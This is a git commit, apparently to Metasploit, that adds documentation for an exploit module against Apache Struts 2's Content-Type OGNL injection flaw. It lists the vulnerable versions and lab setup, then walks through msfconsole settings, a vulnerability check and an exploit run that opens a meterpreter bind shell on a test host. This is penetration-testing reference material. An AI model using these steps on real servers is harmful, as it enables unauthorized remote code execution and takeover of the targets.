Add doc for struts2_content_type_ognl

wchen-r7 · wchen-r7 · commit 295ac63a1c20 · 2017-03-14T16:09:44.000-05:00
diff --git a/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md b/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md
@@ -0,0 +1,104 @@
+```struts2_content_type_ognl``` is a module that exploits Apache Struts 2's Jakarta Multipart
+parser, which makes it possible to perform arbitrary code execution with a malicious HTTP
+```Content-Type``` value.
+
+## Vulnerable Application
+
+Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10 are vulnerable.
+
+You can download these versions here with any version of Apache Tomcat:
+
+http://archive.apache.org/dist/struts/
+
+You will also need to install a Struts 2 showcase application, which can be found here:
+
+https://mvnrepository.com/artifact/org.apache.struts/struts2-showcase
+
+## Options
+
+**TARGETURI**
+
+The path to a struts application action
+
+**VHOST**
+
+The HTTP server virtual host. You will probably need to configure this as well, even though it is
+set as optional.
+
+## Demonstration
+
+**The Check Command**
+
+The ```struts2_content_type_ognl``` module comes with a check command that can effectively check
+if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the
+following:
+
+```
+set VERBOSE true
+set RHOST [IP]
+set TARGETURI [path to the Struts app with an action]
+```
+
+When the module is in verbose mode, the ```check``` command will try to tell you the OS information,
+and whether or not the machine is vulnerable. Like this:
+
+```
+msf exploit(struts2_content_type_ognl) > check
+
+[+] Victim operating system: Linux
+[+] 10.1.11.11:8080 The target is vulnerable.
+```
+
+**Exploiting the Host**
+
+After identifying the vulnerability on the target machine, you can try to exploit it.
+
+The exploit supports mainly two platforms: Windows and Linux. To see a list of available payloads,
+try to do ```show payloads```, and pick one. The following example demonstrates us exploiting a
+vulnerable Ubuntu host:
+
+```
+msf exploit(struts2_content_type_ognl) > show options
+
+Module options (exploit/multi/http/struts2_content_type_ognl):
+
+   Name       Current Setting     Required  Description
+   ----       ---------------     --------  -----------
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST      10.1.11.11          yes       The target address
+   RPORT      8080                yes       The target port (TCP)
+   SSL        false               no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /struts2-showcase/  yes       The path to a struts application action
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/bind_tcp):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   DebugOptions  0                no        Debugging options for POSIX meterpreter
+   LPORT         4444             yes       The listen port
+   RHOST         10.1.11.11       no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Universal
+
+
+msf exploit(struts2_content_type_ognl) > run
+
+[*] Started bind handler
+[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+{"Server"=>"Apache-Coyote/1.1",
+ "Set-Cookie"=>"JSESSIONID=548FF051466E6C1F3AAE814E385057DE; Path=/; HttpOnly",
+ "Content-Type"=>"text/html;charset=UTF-8",
+ "Content-Length"=>"6335",
+ "Date"=>"Tue, 14 Mar 2017 21:04:06 GMT"}
+[*] Sending stage (1495599 bytes) to 10.1.11.11
+[*] Meterpreter session 5 opened (192.168.1.11:50671 -> 10.1.11.11:4444) at 2017-03-14 16:04:36 -0500
+
+meterpreter >
+```
